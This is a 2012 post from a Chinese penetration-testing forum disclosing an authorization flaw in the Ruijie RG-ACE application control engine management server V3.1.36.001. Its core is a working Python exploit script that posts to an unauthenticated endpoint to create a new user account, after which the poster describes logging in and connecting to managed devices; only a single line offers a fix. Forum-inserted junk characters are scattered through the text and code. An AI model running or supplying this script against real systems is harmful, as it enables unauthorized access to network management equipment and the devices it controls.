找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1952|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)) P- d! u1 O2 j6 k2 ~

1 _; x/ _4 r$ d+ l
, l$ B# U! u3 ~. t+ p9 O测试的具体版本是
- W& X$ `( w' ^* |  Z产品名称: 锐捷应用控制引擎+ p$ {! G. J. c
版本号: 3.1.36.001 TC
; @- D4 D% e0 R( W3 B7 [  M$ s编译时间: 201104291730
) w$ k/ z( \% X+ E
: L. c% h9 X* S! m4 g: n* w- [9 ]& Y" u/ E
漏洞证明:' h1 X; j! `: ^' I
9 i3 B+ g8 [1 b
& @- W" U1 m5 {( U
9 E; _' [0 Z' M1 P, @0 n# D  _
' y" z& r) }. T; x1 O

9 K" E$ @4 L1 A- B3 |3 N$ t4 P' B, ^
执行脚本3 k/ p; b) J: g8 k" w
#! /usr/bin/env python
2 W2 z5 ?, v  q2 ~  y#coding=gbk3 b# {8 ]  W$ l4 L
#RG-ACE管理服务器 V3.1.36.001
. o" A: S4 y$ k5 Mimport urllib2, urllib,cookielib5 s4 D. U* S, c/ n  c
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP0 A! e; a( w' T3 B: P
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
4 L9 m' s) B# \7 G) Ropener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]1 ^- h+ P( L2 |( c
post=(("event","userManager.doInsertUserInfo"),+ ]0 S3 e7 R, H
("useractionname","addButtonValue"),2 i4 s% @: f  v% L
("useropermanager","userManager")," z1 P& _6 V! S+ |2 ^
("userName","t"), #######账号自己加" s' Z" i" ?+ D# K: T4 H7 ^; h8 I
("pwd","aaaaaa"),######密码自己加
2 B4 j% q8 z  n("trueName","ad"),
9 n5 n, m5 ^; L("email",""),
& R* V0 b+ m* Z$ `("mobilePhone",""),
. S1 g- Z  N4 l("officePhone",""),
% r: h) y; z3 u3 j- u' `("addr",""),
# {+ Z& j9 H' h: h("submit","确定"))
  a8 _7 K$ m  a* vurllib2.install_opener(opener)3 s1 D4 M6 _% e4 J7 i
p=urllib2.urlopen(url, urllib.urlencode(post)).read()2 y7 e) H2 s9 {, h- N# r
print "Done"
) |8 Q" S/ J* R  ~6 ^- D, D3 _. y6 C
- I; y# Z. G! ^: a' |登录,连接设备- b% c( ~7 f$ N  A) m; z. \
! r& I0 v; E* f6 @+ a, s( ^
' N" b/ k$ Y3 u/ V9 \% o' ]- C

1 u2 L" d/ Z* B3 H& u, h
$ p+ Y) P7 e. Q) g, r- U# J3 [) ?  M
默认的管理员admin权限更大点9 o7 _: {( ~: H% [- b
9 u- ]. Q1 l" G7 j; Q  s
! }. W0 J' ~4 T

5 p# k: p' U# B6 [9 ?/ p7 v. x 7 z' J* X- X. G* S% E2 a! u
- b# }) j0 Z" V1 @" |$ z
修复方案:! c8 [& n* G* @6 O  F
加强对接口的权限验证
5 s& l$ J0 E" i" G. U7 O4 U/ y, g5 r
* x" e' q$ ~; i/ ]9 ]2 g* _( A
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表